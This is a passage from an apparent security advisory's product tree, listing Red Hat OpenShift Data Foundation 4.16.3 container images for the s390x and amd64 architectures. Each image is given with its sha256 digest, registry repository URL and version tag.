"pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_id: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_id: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_id: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_id: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_id: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_id: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_id: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_id: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_id: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_id: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_id: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product: { name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_id: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_identification_helper: { purl: 